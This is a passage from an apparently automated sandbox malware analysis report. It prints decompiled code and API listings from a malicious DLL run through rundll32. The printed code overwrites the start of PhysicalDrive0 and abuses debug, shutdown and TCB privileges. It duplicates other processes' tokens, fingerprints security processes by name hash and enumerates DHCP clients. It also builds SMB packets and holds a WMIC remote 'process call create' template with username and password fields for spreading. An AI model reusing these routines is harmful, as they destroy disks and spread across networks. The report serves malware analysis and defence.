    							_t40 =  *_t33 & 0x0000ffff;
    							if(_t40 == 0x22) {
    								_t43 = 0x5c;
    								_t47[_t46] = _t43;
    								_t46 = _t46 + 1;
    							}
    							_t47[_t46] = _t40;
    							if(_t40 == 0) {
    								break;
    							}
    							_t33 =  &(_t33[1]);
    							_t46 = _t46 + 1;
    						}
    						wsprintfW( &(_t47[_t46]), "\"");
    						_t36 = 1;
    					}
    				}
    				return _t36;
    			}

    APIs
      • Part of subcall function 011E8B70: PathFindFileNameW.SHLWAPI(C:\Users\luketaylor\Desktop\abc.dll), ref: 011E8B80
    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 011E98D8
    • PathAppendW.SHLWAPI(?,wbem\wmic.exe), ref: 011E98EC
    • PathFileExistsW.SHLWAPI ref: 011E98F3
    • wsprintfW.USER32 ref: 011E9913
    • wsprintfW.USER32 ref: 011E9927
      • Part of subcall function 011E6BB0: wsprintfW.USER32 ref: 011E6BD3
      • Part of subcall function 011E6BB0: EnterCriticalSection.KERNEL32(011FF124,00000000,00000114,76E6C426), ref: 011E6BFE
      • Part of subcall function 011E6BB0: StrCatW.SHLWAPI(?,?), ref: 011E6C4C
      • Part of subcall function 011E6BB0: StrCatW.SHLWAPI(?,011FB110), ref: 011E6C52
      • Part of subcall function 011E6BB0: SetLastError.KERNEL32(0000007A), ref: 011E6C5A
      • Part of subcall function 011E6BB0: LeaveCriticalSection.KERNEL32(011FF124), ref: 011E6C65
    • wsprintfW.USER32 ref: 011E9968
    • GetLastError.KERNEL32(?,00000104,?,00000001,00000000,?,011E9C21,?,?,?), ref: 011E9971
    Strings
    • wbem\wmic.exe, xrefs: 011E98E6
    • process call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1 , xrefs: 011E9921
    • %s /node:"%ws" /user:"%ws" /password:"%ws" , xrefs: 011E990D
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    APIs
    • CryptExportKey.ADVAPI32(?,?,00000001,00000000,00000000,?,F0000000,?,Microsoft Enhanced RSA and AES Cryptographic Provider,?,011E1D54,F0000000,?), ref: 011E1CA6
    • LocalAlloc.KERNEL32(00000040,?,?,011E1D54,F0000000,?), ref: 011E1CB1
    • CryptExportKey.ADVAPI32(?,?,00000001,00000000,00000000,?,?,011E1D54,F0000000,?), ref: 011E1CCC
    • CryptBinaryToStringW.CRYPT32(011E1D54,?,00000001,00000000,F0000000,?,011E1D54,F0000000,?), ref: 011E1CE8
    • LocalAlloc.KERNEL32(00000040,F0000000,?,011E1D54,F0000000,?), ref: 011E1CF6
    • CryptBinaryToStringW.CRYPT32(011E1D54,?,00000001,00000000,F0000000,?,011E1D54,F0000000,?), ref: 011E1D0F
    • LocalFree.KERNEL32(00000000,?,011E1D54,F0000000,?), ref: 011E1D1B
    • LocalFree.KERNEL32(011E1D54,?,011E1D54,F0000000,?), ref: 011E1D24
    Strings
    • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 011E1C85
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 100%
    			E011E8CBF() {
    				long _v8;
    				void* _v12;
    				signed int _v16;
    				void _v36;
    				void* _t16;
    				void* _t28;
    
    				_t28 = CreateFileA("\\\\.\\PhysicalDrive0", 0x40000000, 3, 0, 3, 0, 0);
    				if(_t28 != 0) {
    					DeviceIoControl(_t28, 0x70000, 0, 0,  &_v36, 0x18,  &_v8, 0);
    					_t16 = LocalAlloc(0, _v16 * 0xa);
    					_v12 = _t16;
    					if(_t16 != 0) {
    						DeviceIoControl(_t28, 0x90020, 0, 0, 0, 0,  &_v8, 0);
    						WriteFile(_t28, _v12, _v16 * 0xa,  &_v8, 0);
    						LocalFree(_v12);
    					}
    					CloseHandle(_t28);
    					return 1;
    				}
    				return 0;
    			}

    APIs
    • CreateFileA.KERNEL32(\\.\PhysicalDrive0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 011E8CDB
    • DeviceIoControl.KERNEL32(00000000,00070000,00000000,00000000,?,00000018,?,00000000), ref: 011E8D04
    • LocalAlloc.KERNEL32(00000000,011E8DFD,?,?,?,?,?,?,?,011E8DFD), ref: 011E8D0E
    • DeviceIoControl.KERNEL32(00000000,00090020,00000000,00000000,00000000,00000000,?,00000000), ref: 011E8D2A
    • WriteFile.KERNEL32(00000000,?,011E8DFD,?,00000000), ref: 011E8D3C
    • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,011E8DFD), ref: 011E8D45
    • CloseHandle.KERNEL32(00000000), ref: 011E8D4C
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 77%
    			E011E81BA(WCHAR* _a4) {
    				void* _v8;
    				int _v12;
    				intOrPtr _v16;
    				struct _TOKEN_PRIVILEGES _v28;
    				long _t23;
    				int _t24;
    
    				_v28.PrivilegeCount = 0;
    				asm("stosd");
    				asm("stosd");
    				asm("stosd");
    				_t24 = 0;
    				_v12 = 0;
    				_v8 = 0;
    				if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8) != 0 && LookupPrivilegeValueW(0, _a4,  &(_v28.Privileges)) != 0) {
    					_v28.PrivilegeCount = 1;
    					_v16 = 2;
    					_t24 = AdjustTokenPrivileges(_v8, 0,  &_v28, 0, 0, 0);
    					_t23 = GetLastError();
    					_v12 = _t23;
    					if(_t23 != 0) {
    						_t24 = 0;
    					}
    				}
    				SetLastError(_v12);
    				return _t24;
    			}

    APIs
    • GetCurrentProcess.KERNEL32(00000028,?,?,00000000), ref: 011E81DE
    • OpenProcessToken.ADVAPI32(00000000,?,00000000), ref: 011E81E5
    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 011E81F7
    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 011E821A
    • GetLastError.KERNEL32(?,00000000), ref: 011E8222
    • SetLastError.KERNEL32(?,?,00000000), ref: 011E8234
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 100%
    			E011E8677() {
    				signed int _v8;
    				intOrPtr _v12;
    				void* _v16;
    				char _v536;
    				void* _v572;
    				void* _t26;
    				struct tagPROCESSENTRY32W* _t28;
    				intOrPtr* _t30;
    				signed int _t37;
    				signed int _t41;
    				intOrPtr _t43;
    				signed int* _t44;
    				void* _t45;
    				signed int _t46;
    				signed int _t48;
    				signed int _t51;
    				void* _t53;
    
    				_v8 = _v8 | 0xffffffff;
    				_t26 = CreateToolhelp32Snapshot(2, 0);
    				_v16 = _t26;
    				if(_t26 == 0xffffffff) {
    					L18:
    					return _v8;
    				}
    				_t28 =  &_v572;
    				_v572 = 0x22c;
    				Process32FirstW(_v16, _t28);
    				if(_t28 == 0) {
    					L17:
    					CloseHandle(_v16);
    					goto L18;
    				}
    				do {
    					_t30 =  &_v536;
    					_v12 = 0x12345678;
    					_t41 = 0;
    					_t45 = _t30 + 2;
    					do {
    						_t43 =  *_t30;
    						_t30 = _t30 + 2;
    					} while (_t43 != 0);
    					_t48 = _t30 - _t45 >> 1;
    					do {
    						_t46 = 0;
    						if(_t48 == 0) {
    							goto L9;
    						}
    						_t51 = _t41;
    						do {
    							_t44 = _t53 + (_t51 & 0x00000003) - 8;
    							_t37 = ( *(_t53 + _t46 * 2 - 0x214) ^  *_t44) - 1;
    							_t46 = _t46 + 1;
    							_t51 = _t51 + 1;
    							 *_t44 = _t37;
    						} while (_t46 < _t48);
    						L9:
    						_t41 = _t41 + 1;
    					} while (_t41 < 3);
    					if(_v12 == 0x2e214b44) {
    						_v8 = _v8 & 0xfffffff7;
    					} else {
    						if(_v12 == 0x6403527e || _v12 == 0x651b3005) {
    							_v8 = _v8 & 0xfffffffb;
    						}
    					}
    				} while (Process32NextW(_v16,  &_v572) != 0);
    				goto L17;
    			}

    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 011E8688
    • Process32FirstW.KERNEL32(?,?), ref: 011E86AE
    • Process32NextW.KERNEL32(?,0000022C), ref: 011E873B
    • CloseHandle.KERNEL32(?), ref: 011E874F
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    APIs
    • CryptGenKey.ADVAPI32(?,0000660E,00000001,?,?,Microsoft Enhanced RSA and AES Cryptographic Provider), ref: 011E1B66
    • CryptSetKeyParam.ADVAPI32(?,00000004,?,00000000,F0000000), ref: 011E1B87
    • CryptSetKeyParam.ADVAPI32(?,00000003,?,00000000), ref: 011E1B96
    Strings
    • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 011E1B54
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 37%
    			E011E2466(intOrPtr _a4, char _a8, short _a12, short _a16, short _a20, short _a24, short _a28, short _a32) {
    				void* _t19;
    				short _t21;
    				void* _t30;
    
    				_t19 = E011E1000(0x24);
    				_t30 = _t19;
    				if(_t30 != 0) {
    					_t21 = _a4 + 0xfffffffc;
    					__imp__#9(_t21);
    					 *((short*)(_t30 + 2)) = _t21;
    					 *((char*)(_t30 + 8)) = _a8;
    					 *((short*)(_t30 + 0xe)) = _a12;
    					 *((short*)(_t30 + 0x10)) = _a16;
    					 *((short*)(_t30 + 0x1c)) = _a20;
    					 *((short*)(_t30 + 0x1e)) = _a24;
    					 *((short*)(_t30 + 0x20)) = _a28;
    					 *((short*)(_t30 + 0x22)) = _a32;
    					 *((intOrPtr*)(_t30 + 4)) = 0x424d53ff;
    					 *((char*)(_t30 + 0xd)) = 0x18;
    					return _t30;
    				}
    				return _t19;
    			}

    0x011e246c
    0x011e2471
    0x011e2475
    0x011e247a
    0x011e247e
    0x011e2484
    0x011e248b
    0x011e2492
    0x011e249a
    0x011e24a2
    0x011e24aa
    0x011e24b2
    0x011e24ba
    0x011e24be
    0x011e24c5
    0x00000000
    0x011e24c9
    0x011e24cd

    APIs
      • Part of subcall function 011E1000: GetProcessHeap.KERNEL32(00000008,0000FEFF,?,011E271B,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E1008
      • Part of subcall function 011E1000: RtlAllocateHeap.NTDLL(00000000,?,011E271B,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E100F
    • htons.WS2_32(-000000FC), ref: 011E247E
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 100%
    			E011E875A(void* __eflags, long _a4, void _a8, void* _a12, long _a16, void _a20, int _a24, intOrPtr _a36, void* _a88, struct tagPROCESSENTRY32W _a92, long _a96, char _a648, int _a656, void _a660) {
    				void* _v0;
    				void* _v4;
    				void _v8;
    				void* _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				signed int _v28;
    				void* _t62;
    				void* _t68;
    				signed int _t84;
    				signed int _t88;
    				intOrPtr _t102;
    				signed int _t106;
    				void* _t108;
    
    				E011EA4F0(0x1294);
    				_a8 = 0;
    				_a24 = 0;
    				_a656 = 0;
    				memset( &_a660, 0, 0xffc);
    				_t108 = (_t106 & 0xfffffff8) + 0xc;
    				_v0 = 0;
    				_a36 = E011E8494();
    				_t62 = CreateToolhelp32Snapshot(2, 0);
    				_a16 = _t62;
    				if(_t62 == 0xffffffff) {
    					L21:
    					return _a4;
    				}
    				_a92 = 0x22c;
    				Process32FirstW(_t62,  &_a92);
    				if(_t62 == 0) {
    					GetLastError();
    					L20:
    					CloseHandle(_a12);
    					goto L21;
    				}
    				_a24 = _a4 -  &_a648;
    				do {
    					_a8 = _a8 | 0xffffffff;
    					_v4 = 0;
    					_a4 = 0;
    					_t68 = OpenProcess(0x450, 0, _a96);
    					_a20 = _t68;
    					if(_t68 == 0) {
    						L16:
    						if(_v0 >= 0x40) {
    							goto L20;
    						}
    						goto L17;
    					}
    					if(OpenProcessToken(_t68, 0x2000000,  &_v4) == 0 || GetTokenInformation(_v4, 0xc,  &_a8, 4,  &_a16) == 0 || _a24 != 0 && _a4 == 0 || DuplicateTokenEx(_v8, 0x2000000, 0, 2, 2,  &_v0) == 0) {
    						L15:
    						CloseHandle(_v4);
    						CloseHandle(_a20);
    						goto L16;
    					} else {
    						memset( &_a20, 0, 0x38);
    						_t108 = _t108 + 0xc;
    						if(GetTokenInformation(_v8, 0xa,  &_a20, 0x38,  &_a4) == 0) {
    							goto L15;
    						}
    						_t102 = _a24;
    						_t84 = 0;
    						if(_v24 <= 0) {
    							L13:
    							if(SetTokenInformation(_v12, 0xc,  &_v8, 4) != 0) {
    								_t88 = _v28 << 2;
    								_v20 = _v20 + 1;
    								_v28 = _v28 + 1;
    								 *((intOrPtr*)(_t108 + _a4 + _t88 + 0x2a0)) = _v16;
    								 *((intOrPtr*)(_t108 + _t88 + 0x2a0)) = _t102;
    							}
    							goto L15;
    						}
    						while( *((intOrPtr*)(_t108 + 0x2a0 + _t84 * 4)) != _t102) {
    							_t84 = _t84 + 1;
    							if(_t84 < _v24) {
    								continue;
    							}
    							goto L13;
    						}
    						goto L15;
    					}
    					L17:
    				} while (Process32NextW(_a12,  &_a88) != 0);
    				goto L20;
    			}

    0x011e8765
    0x011e877d
    0x011e8781
    0x011e8785
    0x011e878c
    0x011e8791
    0x011e8794
    0x011e87a0
    0x011e87a4
    0x011e87aa
    0x011e87b1
    0x011e8939
    0x011e8943
    0x011e8943
    0x011e87bd
    0x011e87c5
    0x011e87cd
    0x011e8929
    0x011e892f
    0x011e8933
    0x00000000
    0x011e8933
    0x011e87df
    0x011e87e8
    0x011e87ec
    0x011e87f7
    0x011e87fb
    0x011e87ff
    0x011e8805
    0x011e880b
    0x011e8909
    0x011e890e
    0x00000000
    0x00000000
    0x00000000
    0x011e890e
    0x011e8820
    0x011e88f7
    0x011e8901
    0x011e8907
    0x00000000
    0x011e8875
    0x011e887d
    0x011e8882
    0x011e889b
    0x00000000
    0x00000000
    0x011e889d
    0x011e88a1
    0x011e88a7
    0x011e88b9
    0x011e88ce
    0x011e88dc
    0x011e88e1
    0x011e88e5
    0x011e88e9
    0x011e88f0
    0x011e88f0
    0x00000000
    0x011e88ce
    0x011e88a9
    0x011e88b2
    0x011e88b7
    0x00000000
    0x00000000
    0x00000000
    0x011e88b7
    0x00000000
    0x011e88a9
    0x011e8910
    0x011e891f
    0x00000000

    APIs
    • memset.MSVCRT ref: 011E878C
      • Part of subcall function 011E8494: memset.MSVCRT ref: 011E84AD
      • Part of subcall function 011E8494: GetVersionExW.KERNEL32(?,?,?,00000000), ref: 011E84C6
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 011E87A4
    • Process32FirstW.KERNEL32 ref: 011E87C5
    • OpenProcess.KERNEL32(00000450,00000000,0000022C), ref: 011E87FF
    • OpenProcessToken.ADVAPI32(00000000,02000000,?), ref: 011E8818
    • GetTokenInformation.ADVAPI32(000000FF,0000000C,?,00000004,?), ref: 011E883E
    • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000002,00000002,?), ref: 011E8867
    • memset.MSVCRT ref: 011E887D
    • GetTokenInformation.ADVAPI32(?,0000000A,?,00000038,?,?,00000000,?), ref: 011E8897
    • SetTokenInformation.ADVAPI32(?,0000000C,?,00000004,?,00000000,?), ref: 011E88C6
    • CloseHandle.KERNEL32(?), ref: 011E8901
    • CloseHandle.KERNEL32(?), ref: 011E8907
    • Process32NextW.KERNEL32(?,?), ref: 011E8919
    • GetLastError.KERNEL32 ref: 011E8929
    • CloseHandle.KERNEL32(?), ref: 011E8933
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 96%
    			E011E7CC0() {
    				long _v8;
    				void* _v12;
    				long _v16;
    				long _t10;
    				void* _t16;
    				void* _t27;
    				signed int _t33;
    				long _t36;
    				void* _t44;
    
    				_t33 = 0;
    				_t44 =  *0x11ff114 - _t33; // 0x1
    				if(_t44 != 0) {
    					L9:
    					return _t10;
    				} else {
    					 *0x11ff118 = GetTickCount();
    					if(E011E81BA(L"SeShutdownPrivilege") != 0) {
    						_t33 = 1;
    					}
    					if(E011E81BA(L"SeDebugPrivilege") != 0) {
    						_t33 = _t33 | 0x00000002;
    					}
    					if(E011E81BA(L"SeTcbPrivilege") != 0) {
    						_t33 = _t33 | 0x00000004;
    					}
    					 *0x11ff144 = _t33;
    					 *0x11ff104 = E011E8677();
    					_t10 = GetModuleFileNameW( *0x11ff120, "C:\Users\luketaylor\Desktop\abc.dll", 0x30c);
    					if(_t10 == 0) {
    						goto L9;
    					} else {
    						_pop(_t35);
    						_v16 = 0;
    						_t16 = CreateFileW("C:\Users\luketaylor\Desktop\abc.dll", 0x80000000, 1, 0, 3, 0, 0);
    						_v12 = _t16;
    						if(_t16 != 0xffffffff) {
    							_t36 = GetFileSize(_t16, 0);
    							if(_t36 != 0) {
    								_t27 = HeapAlloc(GetProcessHeap(), 0, _t36);
    								if(_t27 != 0) {
    									_v8 = 0;
    									if(ReadFile(_v12, _t27, _t36,  &_v8, 0) != 0 || _v8 != _t36) {
    										 *0x11ff0fc = _t27;
    										 *0x11ff11c = _t36;
    										_v16 = 1;
    									} else {
    										HeapFree(GetProcessHeap(), 0, _t27);
    									}
    								}
    							}
    							CloseHandle(_v12);
    						}
    						return _v16;
    					}
    				}
    			}

    0x011e7cc1
    0x011e7cc3
    0x011e7cc9
    0x011e7d37
    0x011e7d38
    0x011e7ccb
    0x011e7cd6
    0x011e7ce2
    0x011e7ce4
    0x011e7ce4
    0x011e7cf1
    0x011e7cf3
    0x011e7cf3
    0x011e7d02
    0x011e7d04
    0x011e7d04
    0x011e7d07
    0x011e7d22
    0x011e7d27
    0x011e7d2f
    0x00000000
    0x011e7d31
    0x011e7d31
    0x011e8ae9
    0x011e8aec
    0x011e8af2
    0x011e8af8
    0x011e8b03
    0x011e8b07
    0x011e8b19
    0x011e8b1d
    0x011e8b29
    0x011e8b34
    0x011e8b4c
    0x011e8b52
    0x011e8b58
    0x011e8b3b
    0x011e8b44
    0x011e8b44
    0x011e8b34
    0x011e8b5f
    0x011e8b63
    0x011e8b69
    0x011e8b6f
    0x011e8b6f
    0x011e7d2f

    APIs
    • GetTickCount.KERNEL32(?,011E7E00), ref: 011E7CCB
      • Part of subcall function 011E81BA: GetCurrentProcess.KERNEL32(00000028,?,?,00000000), ref: 011E81DE
      • Part of subcall function 011E81BA: OpenProcessToken.ADVAPI32(00000000,?,00000000), ref: 011E81E5
      • Part of subcall function 011E81BA: LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 011E81F7
      • Part of subcall function 011E81BA: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 011E821A
      • Part of subcall function 011E81BA: GetLastError.KERNEL32(?,00000000), ref: 011E8222
      • Part of subcall function 011E81BA: SetLastError.KERNEL32(?,?,00000000), ref: 011E8234
      • Part of subcall function 011E8677: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 011E8688
      • Part of subcall function 011E8677: Process32FirstW.KERNEL32(?,?), ref: 011E86AE
      • Part of subcall function 011E8677: Process32NextW.KERNEL32(?,0000022C), ref: 011E873B
      • Part of subcall function 011E8677: CloseHandle.KERNEL32(?), ref: 011E874F
    • GetModuleFileNameW.KERNEL32(C:\Users\luketaylor\Desktop\abc.dll,0000030C,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,011E7E00), ref: 011E7D27
    • CreateFileW.KERNEL32(C:\Users\luketaylor\Desktop\abc.dll,80000000,00000001,00000000,00000003,00000000,00000000), ref: 011E8AEC
    • GetFileSize.KERNEL32(00000000,00000000), ref: 011E8AFD
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 011E8B0C
    • HeapAlloc.KERNEL32(00000000), ref: 011E8B13
    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 011E8B2C
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 011E8B3D
    • HeapFree.KERNEL32(00000000), ref: 011E8B44
    • CloseHandle.KERNEL32(?), ref: 011E8B63
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 100%
    			E011E8BC6() {
    				long _v8;
    				void* _v12;
    				void* _v16;
    				char* _t31;
    				DWORD* _t32;
    				long _t33;
    				void* _t37;
    				void* _t39;
    				void** _t43;
    
    				_v16 = 0;
    				_v12 = 0;
    				if(OpenThreadToken(GetCurrentThread(), 0x20008, 1,  &_v12) == 0) {
    					GetLastError();
    					L23:
    					return _v16;
    				}
    				_v8 = 0;
    				if(GetTokenInformation(_v12, 2, 0, 0,  &_v8) != 0) {
    					L21:
    					CloseHandle(_v12);
    					goto L23;
    				}
    				if(GetLastError() != 0x7a) {
    					L20:
    					goto L21;
    				}
    				_t39 = GlobalAlloc(0x40, _v8);
    				if(_t39 == 0) {
    					GetLastError();
    					L19:
    					goto L20;
    				}
    				if(GetTokenInformation(_v12, 2, _t39, _v8,  &_v8) == 0) {
    					GetLastError();
    					L17:
    					GlobalFree(_t39);
    					goto L19;
    				}
    				_t37 = 0;
    				if( *_t39 > 0) {
    					_t11 = _t39 + 4; // 0x4
    					_t43 = _t11;
    					while(_v16 == 0) {
    						_t31 = GetSidSubAuthorityCount( *_t43);
    						if(_t31 != 0 &&  *_t31 >= 4) {
    							_t32 = GetSidSubAuthority( *_t43, 4);
    							if(_t32 != 0) {
    								_t33 =  *_t32;
    								if(_t33 == 0x200 || _t33 == 0x207) {
    									_v16 = 1;
    								}
    							}
    						}
    						_t37 = _t37 + 1;
    						_t43 =  &(_t43[2]);
    						if(_t37 <  *_t39) {
    							continue;
    						} else {
    							goto L17;
    						}
    					}
    				}
    			}

    0x011e8bda
    0x011e8bdd
    0x011e8bef
    0x011e8cb3
    0x011e8cb9
    0x011e8cbe
    0x011e8cbe
    0x011e8c00
    0x011e8c0d
    0x011e8ca8
    0x011e8cab
    0x00000000
    0x011e8cab
    0x011e8c1f
    0x011e8ca7
    0x00000000
    0x011e8ca7
    0x011e8c31
    0x011e8c35
    0x011e8ca4
    0x011e8ca6
    0x00000000
    0x011e8ca6
    0x011e8c48
    0x011e8c99
    0x011e8c9b
    0x011e8c9c
    0x00000000
    0x011e8c9c
    0x011e8c4a
    0x011e8c4e
    0x011e8c50
    0x011e8c50
    0x011e8c53
    0x011e8c5b
    0x011e8c63
    0x011e8c6e
    0x011e8c76
    0x011e8c78
    0x011e8c7f
    0x011e8c88
    0x011e8c88
    0x011e8c7f
    0x011e8c76
    0x011e8c8f
    0x011e8c90
    0x011e8c95
    0x00000000
    0x011e8c97
    0x00000000
    0x011e8c97
    0x011e8c95
    0x011e8c53

    APIs
    • GetCurrentThread.KERNEL32(00020008,00000001,?), ref: 011E8BE0
    • OpenThreadToken.ADVAPI32(00000000), ref: 011E8BE7
    • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 011E8C09
    • GetLastError.KERNEL32 ref: 011E8C1A
    • GlobalAlloc.KERNEL32(00000040,?), ref: 011E8C2B
    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 011E8C44
    • GetSidSubAuthorityCount.ADVAPI32(00000004), ref: 011E8C5B
    • GetSidSubAuthority.ADVAPI32(00000004,00000004), ref: 011E8C6E
    • GetLastError.KERNEL32 ref: 011E8C99
    • GlobalFree.KERNEL32(00000000), ref: 011E8C9C
    • GetLastError.KERNEL32 ref: 011E8CA4
    • CloseHandle.KERNEL32(?), ref: 011E8CAB
    • GetLastError.KERNEL32 ref: 011E8CB3
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 17%
    			E011E908A(intOrPtr _a4) {
    				void* _v12;
    				void* _v16;
    				char _v20;
    				signed int _v24;
    				long _v28;
    				char _v32;
    				char _v36;
    				char _v40;
    				char _v44;
    				char _v48;
    				intOrPtr _v52;
    				char _v56;
    				intOrPtr _v60;
    				char _v64;
    				char _v584;
    				void* __esi;
    				char* _t58;
    				intOrPtr _t61;
    				intOrPtr _t64;
    				intOrPtr _t71;
    				intOrPtr _t73;
    				signed int _t83;
    				intOrPtr* _t85;
    				void* _t86;
    				signed int _t88;
    				intOrPtr* _t89;
    
    				_t83 = 0;
    				_t88 = 0;
    				_v48 = 0;
    				_v44 = 0;
    				_v12 = 0;
    				_v20 = 0;
    				_v16 = 0;
    				_v28 = 0;
    				_v24 = 0;
    				_v32 = 0;
    				_v40 = 0;
    				_v36 = 0;
    				_v64 = 0;
    				_v56 = 0x104;
    				__imp__GetComputerNameExW(4,  &_v584,  &_v56);
    				_t58 =  &_v584;
    				__imp__DhcpEnumSubnets(_t58,  &_v48, 0x400,  &_v12,  &_v32,  &_v40);
    				if(_t58 != 0) {
    					L15:
    					return 0;
    				}
    				_t61 =  *_v12;
    				_v60 = _t61;
    				if(_t61 <= 0) {
    					L14:
    					__imp__DhcpRpcFreeMemory(_v12);
    					goto L15;
    				} else {
    					goto L2;
    				}
    				do {
    					L2:
    					_t64 =  *((intOrPtr*)(_v12 + 4));
    					__imp__DhcpGetSubnetInfo(0,  *((intOrPtr*)(_t64 + _t83 * 4)),  &_v20);
    					if(_t64 == 0 &&  *((intOrPtr*)(_v20 + 0x1c)) == 0) {
    						_t71 =  *((intOrPtr*)(_v12 + 4));
    						__imp__DhcpEnumSubnetClients(0,  *((intOrPtr*)(_t71 + _t83 * 4)),  &_v44, 0x10000,  &_v16,  &_v36,  &_v64);
    						if(_t71 != 0) {
    							goto L13;
    						}
    						_t73 =  *_v16;
    						_v52 = _t73;
    						if(_t73 == 0 || _t88 >= _t73) {
    							L12:
